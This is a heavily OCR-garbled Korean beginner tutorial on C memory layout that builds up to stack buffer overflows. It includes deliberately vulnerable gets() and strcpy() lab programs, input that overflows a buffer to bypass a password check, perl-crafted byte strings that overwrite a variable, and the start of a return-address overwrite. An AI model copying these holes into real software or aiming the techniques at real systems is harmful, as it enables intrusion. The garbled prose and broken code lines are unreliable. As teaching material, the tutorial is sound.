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printf(“argument errorwn”);
exit(-1);
}

[/ 22 MO 2 HR QIZLE 2| ¥4 buffer2 SAt
strepy(buffer, argv[1]);

/] SALE UE &
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#include <graphics.h>

main()

{
line(10, 20, 50, 20); // xy ZE 10, 200{|A| 50, 2022 2|2 ~10{2t
line(50, 20, 20, 50); // xy ZF 50, 200{|A{ 20, 5022 2= ~10{2t
line(20, 50, 35, 10); // xy ZHE 20, 500{|A| 35, 1022 2IM=Z “10{2t
line(35, 10, 50, 40); // xy ZF 35, 100{|A{ 50, 4022 2= T10{2t
line(50, 40, 10, 20); // xy ZHF 50, 400{|A 10, 2022 2IM=Z T10{2t
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char name[20];
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long int 4HIO|E -2147483648FE 2147483647
218 A9l et “g477} oo Ba 912 = gyt
dE 50] AZNA FAE &2 2o A 3Hd7A| o] AgE EEot= 2ol
24 g2 Ba gtk 849 A 9 4 ¢l wEgyth

olHY H3T gl ¥t W F oo unsigned (RS §lE)E EoiFH Huth
unsigned char, unsigned int®F Z-2 AU th. 18 ¥0] 27]= vz ol ATk,
7AL Qe Ao He7H S AA Yt

B 7 37| 2| a~Z|CHgk
unsigned char 1HIOIE £E 255
unsigned short int 2HIO|E 2E 65535
unsigned int 4H0|E £ E 4294967295
unsigned long int 4HO|E 02 E 4294967295
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int main()
{

charc;

—

o] “char ¢” BH= FE-E “1uto] E 7]9] W45 t|mal(RAM)o] T Wola &= i

B Qugrt. oA o HE-2 10| E A7] Y 9] 3hE2 o] Haproll A4 sl A
& % U oheat 2ol T
./03/ex1.c
int main()
{
charc;
c=20;

printf ("HIHO| &7t SUS7t~? : %dWn”, o);

4B ke stol Ash BAE
$ cd 03
$ gcc -0 ex1 ex1.c
$ Jex1
HIHo|| 7t SAS7t~? 1 20
$
o|A Y thotA W4E g ARgots A52S ol EksUTt

faFo] & A 4ol EQL YT

2 A MR B B E ol 1
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K}
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@|3 colOfol Ui A1

=] “Hackerschool” o]gt= BAHE-S H o] AAs}7] Q54 &
NULL BEA7ZHA] kool - 13 "pe] EZ} e gt 4uto| Exbe] M4

= 9uto] EZF REF o),

int main()

{
charcl ="H’;
char 2 =‘a’;
charc3="c;
char c4 =k;
char c5 ="¢’;
charc6 ="r;
charc7="s;
char c8 =‘C;
char c9 =h’;
charc10="0
charc11 ="0’,
charc12=";
char c13 = “‘W0’;
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A Clol= "Hld MaTehe Ae Als gy
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int main()

{

Ay go
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/03/ex2.c

/03/ex3.c

Charc[13]_{H7:v:7:k,:)‘s‘)n,:hs‘,:snAwo};
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./03/ex4 .c

int main()

{

char c[13] = “Hackerschool”;

}

i 2 o QA ARSShs B E sy

ghef 130] B}h g 3718 AQ8FA] Fod, Coole Basgh g 2718 AL
2 At FUch
./03/ex5.c
int main()

{

char c[] = “Hackerschool”; // char c[13]2} S

}
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./01/test.c
main()
{
char name[20];
printf(“Y412] 0|5 S YHSIML. 1 %);
gets(name);
printf(“Of, @419 0| &2 %sO0|ZL2.Wn”, name);
}
017] /\1 char name[20 C’] HEZ B2 ALS-E ‘F% AAsh= FEAYTE 18

i ﬁcﬂﬂ‘”ﬂ Uﬂfoﬂ 37]“ 1x20 203}0]‘E J‘%E}.
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/04/ex1.c

inti=77,;
printf(“i2] 2k : %dwn”, i);

i hPEl Za oy @
Wa 3y .
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iet= |59 8

=, W7 fRISHL le vl e 4, Mg g 7], 22]al Hao] AR gkl
sigsts dEEdYT
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Je3 (M= int B2
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/04/ex2.c
main()
{
inti=77;
printf(“i®] 2t : %dWn”, i);
printf(“ie] 27 : %dwn”, sizeof(i)):
1
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./04/ex3.c

{
inti=77;
printf(“i®] 2t : %dWn”, i);
printf(“i2] 27| : %dWn”, sizeof(i))
ZA D 0x%xWn”, &i)

printf(“iel Hl22| &

2]

o2

(&

gLt

ol zf:77

o] 37|:4
o| 22| FA : Oxbfffe784
Zoj| wet gat
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./quiz/quiz.c
main()
int auth = 0;
char passwd[20];

printf(IHAEE SN« ¢
gets(passwd);

~

/] A E T} “secretkey’2tH Q1= E1}

if(strcmp(passwd, “secretkey”) ==
auth=1;

if(auth)

else
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$ cd quiz

$ gcc -0 quiz quiz.c

$ ./aquiz

IHA LI EZ 2125HM|2 : abed
QIS0i| MuliSt RS LTt

$

olfidl A2 H WAEE ol HAS Y.

$ /quiz
IARIEZ Q2ASIM|L : secretkey
S5tefLct QIS0 St ASLICH

$
Lol 42 FEo A YPAJEES E 5 917] w0
Syt
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% uhR oA Brhar

o
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Jquiz/real_quiz.c

main()
{
int auth = 0;
char passwd[20];
printf (AR EES YASML 1 9);
gets(passwd);
if(strcmp(passwd, “[?????2??]") == 0)
auth =1;
if(auth)
printf (‘S ct. 2130l S2StASUICHWN);
else
printf(“21Z0]| AT ELICH wn”);
}

A AEel RIQF F /quiz FHE o1F0H real quizehe Telol U

o = WHA JSE TS 2AL)
A7, S oy E = dojA s e sidshs 2ArES ot HA] ohvkl

O™ A% HH2 9] Q8 $71 () dtte AARSUH.
J%7] wze] ol ¥ ohE WH-S Zot ZAE FA4oF gt
o|A| sHH Zo]B A Q! good luck!
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ool £AIS 7] §IaAl vme] Fel ol & olsista glofo gt
94 ofe] o] W7t 9Le W A= 7ke] vlze] §1%] A} oA B ohs

robg A,

main()

{
inta=1,
intb=2;
intc=3;
intd=4;

slok o] ] A2l WS s
oA Fh QAR &F o] §Bte] 2t M4o] FAT

tlo
i
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jil)d
i
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main()
{
inta=
intb=2
intc=3
intd=4
printf (‘a8 4 : 0x%xWn”, &a);
printf (‘b2 FA : 0x%xWn”, &b);
printf(“‘ce| FA : 0x%xWn”, &c);
printf(‘d2| A : 0x%xWn”, &d);
}
Al 20}
$ Jex1

al| 4 1 Oxbffffb44
bo| =4 : Oxbffffb40
c8| 4 1 Oxbffffb3c
do| 4 : 0xbffffb38

./05/ex1.c

$
x ZAL A% BHO| T2t THS 4 YSLICH SHAB B4 FAS 210] 913 BAL S
Azt

a
Oxbffffb38 Oxbffffb3c 0xbffffb40 Oxbffffboa4
4H[0[E 4B[0[E 4B[0[E 4B[0[E
4 3 2 1
L = F2TL mp
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./05/ex2.c

{ inta=1;
char b[20] = “hello”;

printf(“a®l F4 : 0x%xWn”, &a);
printf (‘b2 A : 0x% xWn”, &b);

a9 ZFA 1 Oxbffffbd4
b2| A : Oxbffffb30

b a
0xbffffb30 Oxbffffb44
20(0x14)HIO|E |4HIO|E
“hello” 1

-ezs FoFL mp
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5ot oAl real_quiz ZA| wFLof tie MR 2] IH S T4
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main()

{

t
aC
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4
ke

Fat ZAdRA Qo] HEe] 2ol
ol Ae1E917] Tl auth K
Apol o] Ael7} 200]eks AE g B

48
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int auth = 0;
char passwd[20];

printf (A =S YHSML - %);

gets(passwd);

auth =1;

if(auth)
printf(“ZotgfL|Ct. 2SO
else

printf(“QI S0l HIHotRSLICH #wn”);

pacswd auth

B WA= 20

20H}0| E 40| E

BEYE AR

./quiz/real_quiz.c
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getsO= “7|REZHE Exd-S ¢l do} H o
o] g4 shtol Qe @ Fsl=y), I AL euke zke et
/06/ex1.c

main()

{
char buffer[20];

gets(buffer);
printf(“%swn”, buffer);

A7) A gets] Q124 H | “buffer’ e H2}s] RAAIRY
buffergt AHA &bufferfl} FAgY} &, buffer Ml WSS9 A2 F=AAY

pi
oA "EiBe] o] F2 T BB AlAF Faet Fdsie 2kl o= o] 7] HEdY
ot.

o]

CPA] Tl gets() @40] QbR ksl 21 “Wme] 4 gkel Ak 9 oA
oA buffer §14=2] A|& F47} Hytt.

“buffer®] A2 347} ol AU o7 1 MR E AT 7 ek Tohs At e,

T8 gersOk ol AHAA) Qe e Arkar
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|6 gets() &4 Olsli5t7|

I ARe uhz A7 9 8 WA gy

oAl m21Be AWs) BH, QA7H: AEE Qe sloRt gersO Fel A HofLt
ohg etelo] AaEe o 4 gl

39 9 AHES BT = getsO & thA] gofsl] EASY .

oloh 2L AL WIH QHERS FoPHS ob/]5hlo] SR eI
A9 HET dete] 2 H SR8 WA de

et

xxx: the ‘gets’ function is dangerous and should not be used.
ol A @ gets &t IR otL] YBHSHH ALEot2| =2 £227?

o)A Y EE BYUH
W50 lRe] 4 P, L2l gers( 0] EAS F ol BAS Bofd 5
9104 et W,
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Al —rxﬂ,] _/ti_—?l__\:_—g— C}A] SHH H AL U o) ./quiz/real_quiz.c
main()
{
int auth = 0;
char passwd[20];
printf(MHAIEE LASIML 1 9);
gets(passwd);
if(strcemp(passwd, “[???2?2??]") == 0)
auth=1;
if(auth)
printf(“ZotatLICt 2130 S2tetASLITH W),
else
printf(“Q1 S0 ATHotH & LICH Wn”)
1
ofu} &g gFEA] Fotil BE2 oEAIE A [79977777] ¢toll Q& S Lol B
T oS Ay,
3o ¥

shAlr j7olet B4 shke] gt 2 7ekd Qe



# segi-siiio | RN
Quiz$%!%ir%l1|9|%ja| ®

of elie] Fole oM AukER] MZE Fol ST 4 JEUT
o714 H QM ERS Pl BAE B2 918 A4 HIIEL: thet BT

“WAYES GPEAE SA5HE £E9] auth ¥4-2] 271342 0ok,
2930 v A9 =7} gehe auth @S 10] ek,
1 the 299 if(auth) auth7h #12] ARNAE B,
0 if2ed egel 08 ola $24 Fo] B
2, 10t} -1 52 1000]L} 999 5 B zho] satct.”

£hA] Wl o] BAle4l auth Zke] 0] AT SEOT Q1Fo] FasHA o] Y&t

the 9] g zho] e 1etolEeka AYztahe] HAW w AU
g 7to] 270 8to]Eo] U7} Abo] = Bt A2

passwd B14=9] A|Ef F4
L 8

&passwd gpasswdt1 |Rpasswdi2 |Bpasswdi3 |&passwdi4 |&passwdi5 |Spasswdi6 | &passwdi7 | &passwdiB | Gpasswdi9 |&passwdi10 |&passwd+ll

ox
-geEs E=2Fi

&passwd+12 | &p: d+13 | &p: d+14 | &pi d+15 | &p: d+16 | &p d+17 |&passwd+18 |&passwd+19 | &auth &auth+1 &auth+2 Zauth+3

auth P=0| AR =

ret
Bl

rel

Z2 B @sl7|d 712 Zol7t U Aol £ 2 Ui Aoy ZusiA 4.

A v e FATE Sl e Ref #*} 19l 9121 A7t S835H7] diel

oA A 2Ide HeYst 9] MR F27} g A Wst=A] BAG Y
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b, A12517] Ao
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2f 2Ae| GE

auth®] £7] g 00]7] T 1Y) 02 4
H S0]7}= o]-f+= auth] ¥4 EFQlo] into]

11, into] A7) 44to]

Al
E

o,
W
a2 0

passwd B13=0| A|Ef 4
’
&passwd gpasswd+1 |&passwd+2 |&passwd+3 |&passwd+4 |Bpasswd+5 |&passwd+6 |Gpasswd+7 |&passwd+8 | &passwd+9 |&passwd+10 | &passwd+ll
L FoFow
&passwd+12 | &passwd+13 | Bpasswd+14 | &passwd+15 |&passwd+16 | &passwd+17 |&passwd+18 | &passwd+19 | &auth Zauth+1 &auth+2 Zauth+3
0 0 0 0
1
auth H==92| A%} Fa
2F5h o}
oA AlAFet T
$ /real_quiz
Ao|lC 2 olegdgl S
MALIES YHASIM|L : abed
o|= AlTHSEH A
21 S0l A5t ASLICE.
2 ¢ "2 0 13;_0_1;q]g ] g] Aty _O_J—q.ﬂ—]EJ 011,]1—4.
‘r"l;q ‘abed = —19}12 i A ™ £ 27/_11:1 .
passwd B1=0| A|Ef FA
’
&passwd &passwd+1  |&passwd+2 |&passwd+3 |&passwd+4 | &passwd+5 | &passwd+6 | &passwd+7 | &passwd+8 | &passwd+9 | &passwd+10 | &passwd+11
a b C d
- geFs E2FLw
&passwd+12 | &passwd+13 | Bpasswd+14 | &passwd+15 |&passwd+16 | &passwd+17 |&passwd+18 | &passwd+19 | &auth Zauth+1 &auth+2 Zauth+3
0 0 0 0

A7 ol sl HA12] 87
FE “abed” 2] NULL-S

eFslod gy,

1
auth H==0| A|Z} F4
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WA LHELS-SEa1h T A
: Azl cr 0
Quiz 72t 242 dE
=3 o O 0 5 Al L
Al o B2 UeS dga) BASY
$ ./real_quiz
HALIES UM : abcd1234567890
= A
QUS0l| HIlstAS LT
passwd B14=9] A|EF F4
8
apasswd Zpasswd+1 |&passwd+2 |&passwd+3 |&passwd+d |Rpasswd+5 |&passwdi6 |&passwd+7 |&passwd+B |&passwd+d |&passwdt10 | &passwd+11
a b c d 1 2 2 4 5 6 i 8
wseza FeFim
&passwd+12 | &p: 1+13 D d+14 | &pi d+15 d+16 | &p d+17 |&passwd+18 |&passwd+19 | &auth &auth+1 &auth+2 Zauth+3
9 0 0 0 0 0
o|o} 7
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auth B5=9| A|Zf
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$ ./real_quiz

MALEES YASIML : abcd1234567890XXXYYY

QU S0l| HIlstAS LT

$
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Quiz &

passwd B15=9] A|ZF F4
'
apasswd Zpasswd+1 |&passwd+2 |&passwd+3 |&passwd+d |Rpasswd+5 |Rpasswdi6 |&passwd+7 |&passwd+B |&passwd+9 |&passwdt10 | &passwd+11

a b < d 1 2 3 4 =) 6 7 8
. woma Fers=

&passwd+12 | &passwd+13 | &passwd+14 | &passwd+15 | &passwd+16 | &passwd+17 | &passwd+18 | &passwd+19 | &auth Zauth+1 &auth+2 Bauth+3

9 0 X X X Y Y Y 0 0 0 0

1
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passwd H=0| A|Z A

gpasswd  |&passwdi1 |&passwd+2 |&passwdi3 |&passwdid |8passwdiS |&passwdif |&passwdi7 |RpasswdiB |&passwdt9 |&passwdi10 | &passwdi11

a b C d 1 2 3 4 5 6 74 8

o< o<
DR EeFLw

&passwd+12 | &passwd+13 | &passwd+14 | &passwd+15 | &passwd+16 | &passwd+17 | &passwd+18 [ &passwd+19 | &auth &auth+1 &auth+2 Zauth+3
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auth W4l AT T4
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$ /real_quiz

IHAQIE S QAHSIM2 : abcd1234567890XXXYYYZZZZ!! |l @@@@
Z5tLCH QIS0 S2tetRE L CH

Segmentation fault
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I2 78 HE main()2 A|Zre 2 750t 5
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2R BE TE7} main() ol QoW Tt 2 EAES0] AAU] A
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O 33, main() oo BE 24 IS 20jH OB LIBO| HH AT LV
CHE Al 22 M2I0f 2T E A4 REE Of3H57] FS0AIA BLIc
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int get_area(int x, inty)

int area;
area=x *y;
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int get_round(int x, inty)

{

int round;

round = (x +y) * 2;

return round;
main()
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int area, round;
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round = get_round(x, y);
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int get_area(int x, inty)

{
int area;
area =x *y;
return area; AIE return &
}
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void get_area(int x, int y)
{
int area;
area =X *y,
ZIHE returnstA| Y HEZ £ &t
prmtf(“Af%F%*Q 10| :%dwn”, area);
}
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1:// A4 e| §O0|E Ftot= e
2 i int get_area(int x, inty)
3
4: int area;
55
6: area=x *y,
7 return area;
8:}
9:
10 : main()
11 :{
12: intx=10,y=20;
13: int area;
14
15: area = get_area(x, y);
16: printf(“AFZ-&12| HO| : %dWn”, area);
17 1}
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/08/ex1.c
1:// A4l §O0|E Ftot= e
2 i int get_area(int x, inty) h
3
4: int area;
58
6: area=x *y,
72 return area;
8 S
9:
10 : main()
11 :{
12: intx=10,y=20;
13: int area;
14
15: area = get_area(x, y); -/
16 : printf(“AtZt& 2| 0| : %d¥#n”, area);
17 1}
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1:// AP e| E0|Z ot= &
2 lint get_area(int x, inty)
3:{
4: int area;
5:
6

7

8

area=x*y,
return area;

: ™~
'}
9:
10 : main()
U7 24 =5
12: intx=10,y=20;
13: int area;
14
15: area = get_area(x, y); < ~
16 : printf (‘A& 2| S10| : %dWwn”, area);
171}
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1:1// A4 -2l 0|8 Ftot=
2 int get_area(int x, inty)
3:{
4 int area;
5:
6 area=x *y,
7: return area; <— 158 2}RIO 2 JtA|L
8:}
9:
10 : main()
11:{
12 intx=10, y=20;
13: int area;
14
15: area = get_area(x, y); <«— 28 2{RIo=2 JiA|2
16: printf(‘“AFZ+&le] 50| : %dwWn”, area);
17
18: /] st ¥ ‘IiéﬁHﬂxf
19: area = get_ a(x y), 4— 22 2002 JIA|L
20: printf(“Ap2t %OI 0| : %dWn”, area);
21:}
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2 int get_area(int x, inty)
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4 int area;
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6 area=x *y; 2,d
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8:}
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10 : main()
11:{
12 intx=10, y=20;
13: int area;
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2H 21010 2 JtA|2
16 : printf(“AFZ&Q| §10| : %dWn”, area);
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20: printf(“AFZ-&2| 10| : %dwn”, area);
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int get_area(int x, inty)

{

int area;

printf(“QIZF x| FA Ox%xWn”, &x);
printf(“QU2F yO| A 0x%x#n”, &Yy); ] 27t
printf(“‘get_area &4 LK areal| &4 0x%xWn”, &area);

area=x*y,

return area;

}
main()
{
intx=10, y=20;
int area;
printf(“x2| FA : 0x%xWn”, &x); )
printf(“yQ| A : 0x%xW#n”, &y); ] =7t
printf(“areal| F4 : 0x%xWn”, &area);
area = get_area(x,y);
printf(“AtZ-& 9| K10| : %dwn”, area);
}
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00000e0 8108 0804 0020 0000 0020 0000 0004 0000
00000f0 0004 0000 6c2f 6269 6c2f 2d64 696¢ 756€
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/10/ex1.c

int main()

{

char str[20] = “hackerschool!”;

printf(“%swn”, str);

}
A7IA 27 L A2 AL W sere] 40} T1of st 1634 FEdY
07 e gol 42 IES S-S B AU
/10/ex2.c
int main()
{
inti;
char str[20] = “hackerschool!”;
printf(“%swn”, str);
printf(“ HEX DUMP START #wn”);
I 24 i =3
printf(“Ox%08x “, &str);
/11632 &
for(i=0; i<sizeof(str); i++)
printf(“%02x “, strli]);
printf(“Wn HEX DUMP END #Wn”);
}

>
)
ol
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$ gcc-oex2 ex2.c
$ Jex2
hackerschooll!

HEX DUMP START
Oxbffffb30 68 61 63 6b 65 72 73 63 68 6f 6f 6¢ 21 00 00 00 00 00 00 00
HEX DUMP END

$

oAl ] ZEE 7|E 0 25}o] H-% hex dump B7 W&o U 4= Jl=H 8, o2
=Y 8]# ohhara@ 714 o]u] ¥HE0] 241 dumpcode.het= el 4o,

./10/dumpcode.h
// dumpcode.h by ohhara

void printchar(unsigned char ¢)

{

if(isprint(c))
printf(“%c”,c); // iest= A4S 2= BA|
else
printf(“.”); /| 28 2715t A= 1Y 22 HA|

}

/I HZ2] AZF A4 E2HE T7|E AARE EE
void dumpcode(unsigned char *buff, int len)
{
inti;
for(i=0;i<len;i++)
{
// 16HI0|E &H2|2 ZA =3
if(i% 16==0)
printf(“Ox%08x “ &buff[i]);

// hex 2f &
printf(“%02x “,buffl[i]);
/1l 16&'42 = A2t ZAZ2 £

if(i% 16-15==0)
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{
int j;
printf(“ “);
for(j=i-15;j<=i;j++)
printchar(buff[j]);
printf(“wn”);
}
}
// OHA|8} 2+210] 16HI0|E O|5tY 22 A8 R4
if(i%16!=0)
{
int j;

int spaces=(len-i+16-i% 16)*3+2;
for(j=0;j<spaces;j++)

printf(“ “); /| £=3t S7t0tF spaceZ 0| S8t =,
for(j=i-i% 16;j<len;j++)
printchar(buff[j]); /I 22 22 3= &
}
printf(“wn”);

o]2 A~ FTof| 75 ALY, -2 dumpcode.h& FHE 5 include A17]9
dumpcode(Q2h= 8 AT 4= A Yo E+= dumpcode.h& /usr/include/
telzelo] BAte] Yo o] ARAAE includestel ALgaHA & Sl
“12]al dumpcode() o9 U¥2 ok E5U

void dumpcode(unsigned char *buff, int len);

buffel dumpotzfote wle] o] Azt =4, 241 lendll dump@ A7]E A A Y
=

95
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=+ dumpcode()E AHESE A A Y T}

/10/ex3.c

#include “dumpcode.h”

int main()

{

inti;

char str[20] = “hackerschool!”;

printf(“%swn”, str);

// str

H-0| MEE| 100HI0|EE 2

dumpcode((unsigned char *)&str, 100);

(2 2]

$ /ex3

hackerschool!

Oxbffffb30
Oxbffffb40
Oxbffffb50
Oxbffffb60
Oxbffffb70
Oxbffffb80
Oxbffffb90
$

68 61 63 6b 65 72 73 63 68 6f 6f 6¢ 21 00 00 00 hackerschool!...
00 00 00 00 20 97 04 08 68 fb ff bf cb 090340 ... ... h...@

01 00 00 00 94 fb ff bf 9c fb ff bf 6838 0140 ............ h8.@

01 0000 0090 83 04 08 00000000b1830408 ...............
248604 0801 00000094 fb ffbf e4 820408 $...............

ac 86 04 08 60 ae 0040 8c fb ffbf 903e 0140 ...".@...>.@

01 00 00 00

oA uHA] xxd § = A& AAH w22 HES & 5 U HASH.

o|lAd g9 F4AL} 2k Fog XY RlGrIHA Ho] QHEZQE FHEHH,
o] HA Wma]o] 2L o]aja £ 9l A| H1, S|/t ¥ xs wima] gho] & up gl

A SIS, H3 QHERS FoFES ofF

Al s=Fsor EAlef et defa &

2 7 Hy o
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dumpcode() F4=ofl tiaf &7 B FE= A=
A48 57| 2 npe o HL]E]-
FERE WA 4vol=Ae] 459 MAE Shi wE
IS memory dumpE S|E7|2 FFYTh

~lO[l

#include “dumpcode.h”

int main()

{
int test = 10;
dumpcode(
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y gz ol 7kl dwmP
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ot LR}ﬂ\"I"-

ﬂg_e'lﬂ PN
2 yest Wil ik E-f\.sﬂl-:;:-!i‘?
| 'I = |-_E1_TI|
e it w gtk

qmn 5 Alzkz

2 ] o
a2 ikl galth kE 2| % &
nTS




HA ilﬁzl’s_——‘i,l-vliwi
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J11/ex1.c
#include “dumpcode.h”
int main()
{
int test = 10;

dumpcode(&test, 4);

$ gcc-o ex1 ex1.c
ex1.c: In function ‘main’:
ex1.c:7: warning: passing arg 1 of ‘dumpcode’ from incompatible pointer type

$

e~ B3},
ol #f ol 3}

types YHZT |l ok

S Fngch,

L
wowvningel Bel?
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dumpeade!) iF-Fa AL
vaid dumpcode
ftansigned chov "buaFE. int lenki o2&
ol zb3 HErE 2tes+ 94
wnsigned chov ™ +ypel s R T3l
oldl B PRB(+ype conversion)
ol 22 Foke}

J11/ex2.c
#include “dumpcode.h”

int main()

{
int test = 10;

dumpcode((unsigned char *)&test, 4);

(Eme 20

$ gcc-oex2 ex2.c

$
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dumpcode() & ZE AT, TeHE Fe7} ol e A HATY T

$ Jex2
Oxbffffb44 0a 00 00 00
$

21,7
26 ® [0o 00 00 0ok okul2h
[oo 00 00 00]olz]7
Wl HE FEYUT
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Little Endian

A Hhol = Sl HY 44217 E491AE B ¢ 4 oY) TRt Tely @4t
WA 2434 71 BRE 0 Big Endian WAIR T o ok gk,
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#include “dumpcode.h”

int main(int argc, char *argv[])

{

(—

char target[4] = “DOG”;
char buffer[20] = {0, }; // 082 27|35}

if(argc < 2)

{
printf(“argument errorn”);
exit(-1);

}

// dumpcodeZ 0|22 H
dumpcode(buffer, 24);

printf(“[*] BEFORE : the value of target is %sWn¥n”, target);

/] 2 A Q== HMEE 2XEE bufferE SAt
// 7| buffer overflow gr4l1
strcpy(buffer, argv[1]);

// dumpcodeZ H|22| EX
dumpcode(buffer, 24);
printf(“[*] AFTER : the value of target is %s¥n”, target);

] AL FEO] A= /12/ex].cdYTH
A 5 AP SflF AT

J12/ex1.c
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$ ./ex1 abc

Oxbffffb20 00 00 00 00 00 00 00 00 00 00 00 00 00000000 ................
Oxbffffb30 00 00 00 00 44 4f 47 00 ....DOG.
[*] BEFORE : the value of target is DOG

0xbffffb20 61 62 63 00 00 00 00 00 00 00 00 00 00 00 00 00 abc.............
O0xbffffb30 00 00 00 00 44 4f 47 00 ....DOG.

[*] AFTER : the value of target is DOG

$

* OREDIR2 F4 32 A% 0 T2 9ot 4 st

o}FL ol d WR L slelA] ¢ety] wRe| 7] kel “DOG’7F &2 5 9Lt

A HA S target Hrofl 971 “DOG 2= 3h& “CAT o2 v H = AYYrt.
AA IR B QHEZO] Y E HAZH ZAE EolHA Q.

Z¥2F vmware ©|H|X]E BH 5t 214 Ao HA| T, HHE-S A Tof dH = AlG

ek,

o
TE2

E}

$ /ex1 AAAAAAAAAAAAAAAAAAAACAT

Oxbfffflb10 00 00 00 00 00 00 00000000 000000000000 .............
Oxbffffo20 00 00 00 00 44 4f 47 00 ....DOG.
[*] BEFORE : the value of target is DOG

Oxbffffo10 414141414141 41414141414141414141 AAAAAAAAAAAAAAAA
Oxbffffb20 414141 4143415400 AAAACAT.

[*] AFTER : the value of target is CAT

$

Ay, target R4 gfoll buffer |47} 205}01 EE 2AIskL 97 W2,
o] gl AChE #1& 20MPe|EE HIA Yt &, o]ojAq CAT2 =T AdYt

111
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J12/ex2 .c

#include “dumpcode.h”

int main(int argc, char *argv[])

{
int target = 1234; // 0| 2}= & AIL|Ct,
char buffer[20] = {0, }; // 022 27|35}

if(argc < 2)

{
printf(“argument errorn”);
exit(-1);

}

// dumpcodeZ H|22| EX
dumpcode(buffer, 24);
printf(“[*] BEFORE : the value of target is %d¥Wn¥n”, target);

// buffer overflow!!
strcpy(buffer, argv[1]);

// dumpcodeZ H|Z22| EX

dumpcode(buffer, 24);
printf(“[*] AFTER : the value of target is %dWn”, target);

TRE7HA 2 Hutd & A s Al
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\ |12531|0I%>' IA 22| Y 9|

$ gcc-oex2 ex2.c

$ ./ex2 abc

Oxbffffb20 00 00 00 00 00 00 00 00 00 00 00 0000000000 ................
Oxbffffo30 00 00 00 00 d2 040000 ...

[*] BEFORE : the value of target is 1234

3

rE
N
ol

0xbffffb20 61 62 63 00 00 00 00 00 00 00 00 00 00 00 00 00 abc.............
Oxbffffb30 00 00 00 00 d2 040000 ..
[*] AFTER : the value of targetis 1234

$

oA o] 12348h= Fh-2 56782 HHYEAI T
“[*] AFTER : the value of target is 5678” ©|2t1l &H=H A¥

L
P
1A
°
iu}

$ /ex2 AAAAAAAAAAAAAAAAAAAASGTS

Oxbffffb10 00 00 00 00 00 00 000000 0000000000000Q0 ...............
Oxbffffo20 0000000002 040000 ..

[*] BEFORE : the value of target is 1234

Oxbffffb10 414141414141 41414141 414141414141 AAAAAAAAAAAAAAAA
Oxbffffb20 4141 414135363738 AAAA5678

[*] AFTER : the value of target is 943142453
$

9431424530]F]? o] A%t 5247} e BT,

114
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EEH

Dec Hxdctk Char Dec Hz Oct Himl Chr |[Dec He Oct Himl Chr) Dec He Qeb Himl Chr
0 0400 NL {mall] 52 20 040 «#32: Spoce| 64 40 Lod <464 B a5 60 140 e#962
1 1L ] [etakT OC haeding]| 33 2L D4l LF53; ! 55 41 Lol «§835; A | 97 g1 L4l o@37: =
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Syt

Oxbffffb20 41 41 41 41 3536 37 38 AAAA5678

2] 7 Little Endiang AFE3F= Intel CPUOA] 4H}0]E A4 ZH-e vig] Hhgko 2 A
A= §17] w2, wlmalo] A= 35 36 37 389] AA| -2 38 37 36 359U Th.
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0h&-2 217} perla} pythong ol-gato] "%:7} 578 A AU,

[perl]
$ perl -e ‘print “Wx05

x -e . perl AT EE QA2 HE

[python]
$ python -c ‘print “Wx05

Eh)

* -C : python 23 ZEEZ Q22 MY

& python> ¥+ 1|9, perlof| A 125 ARE-S wj<ll “double quote?} ‘single
quote®] =40 f-2ol5kAoF gttt

ol o]% o] f-ako] THA] T rargeto] S 56782 BIFIHAILE,

)7 2 E o2 2AH A5
perlo]t} python®] A8 A7E ex2 T2 10| A A oF gk Ayt

TR o] @A 4T S Qs 2P,

ol perle A3t Al otz “perl ..7olehs 2AE S AR H7]= A7l HiE

2yt

¢

ol uf K715 AFGEE A9 Z)5 B (M 5L WE) S4RAUL =
= A9 Atolo] Soizt 4 el £ ATE Ao HEelFE e Pyt

ot olAlE EAIE & olsi7h =4 Ayt
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$ echo whoami
whoami

$ echo ‘'whoami’
student

$

3

rE
N
ol

whoami €l H= 2] A3 A7 studentE THA] A PP o] AR =Z It AUt

oA 0|2 ol g5te] BAIS A BAZUC

$ /ex2 AAAAAAAAAAAAAAAAAAAA perl -e ‘print “Wx05™

Oxbfffflo10 00 00 00 00 00 00 0000 0000000000000000 ...............
Oxbffffo20 00000000d2 040000 ..

[*] BEFORE : the value of target is 1234

Oxbffffo10 4141 41 41 4141 4141414141 4141414141 AAAAAAAAAAAAAAAA
Oxbffffb20 41 41 41 41 0500 00 00 AAAA....

[*] AFTER : the value of target is 5

$

o 7127 o] 4% o]l E4 5(0x35)7F obdl, 52t 5(0x5)7F A= AL Y]
o,

AL =2F 56782 s HASUTH

24 1074 56780] 1652 += FA1A] AALS Sl A|th.

10214 56782 16742 Wx16Wx2e YTt

npzE o 2 F 99t 22 o] k- Little Endian FH|= w2 2] o] Hojof ghrh= A Y
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12.E30]d 2A : B|22| gt HEE |

b BB BN BEM PN BN MM BN )
bl BRBE SRR BB BEE BED MRl 310 BEGa BN BRGD B4R BRR] G118 IR BNIR
ray i | A | E L E -.- A jwt wm | e | w
]

. LN E=3 (p : IS

g ot

LB R R 7 ! 5 L L2 [N ™ T 7 B q -
e | | v o 1 e = 4l 5l &

s - - - : [

2 1 i i

fwa - - it - £ -

yir bk | hnd o s L] oot || el | F i

ot whEbA 4 2 Wx2eWx160] = ofof gt

$ ./ex2 AAAAAAAAAAAAAAAAAAAA perl -e ‘print “Wx2eWwx16™
Oxbffffb10 00 00 00 00 00 00 00 00 00 00 00 00 00 0000 00 ................
Oxbffffb20 00 00 00 00d2 040000 ...

[*] BEFORE : the value of target is 1234

Oxbffffb10 41 41 4141 41 41 4141 41 41 41 41 41 41 41 41

AAAAAAAAAAAAAAAA
Oxbffffb20 41 41 41 41 2e 16 00 00 AAAA....
[*] AFTER : the value of target is 5678
$
AR~ rarget 3 5678 HHRE A TG
% o 98] 5] 9le) olWal EFT ShAS et £

31337 (elite—yeleet—>31337) 0.2 B HA] Q.

o
ol
rlo
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§ /ex2 AAAAAAAAAAAAAAAAAAAA perl -e ‘print “Wx69Wx7a™
Oxbfffflo10 00 00 00 00 00 00 0000 0000000000000000 ...............
Oxbffffo20 00000000d2 040000 ..

[*] BEFORE : the value of target is 1234

Oxbffffo10 4141 41 41 4141 4141414141 4141414141 AAAAAAAAAAAAAAAA
Oxbffffb20 41 41 41 41 69 7a 00 00 AAAAIZ..

[*] AFTER : the value of target is 31337

$

s

QJuiTh. Alzbe] HAITHE 27 ThE £4HE A9 theo] MAsHE A4 AR,
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ofA| wpA|eF Eglold
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J12/ex3.c

#include “dumpcode.h”

int main(int argc, char *argv[])
{
char buffer[20] = {0, }; // 022 =73t
int *pointer_to_ret = (int *)(buffer+24); //retS £25}7| /st ZQIE] tH4

if(argc < 2)

{
printf(“argument errorn”);
exit(-1);

}
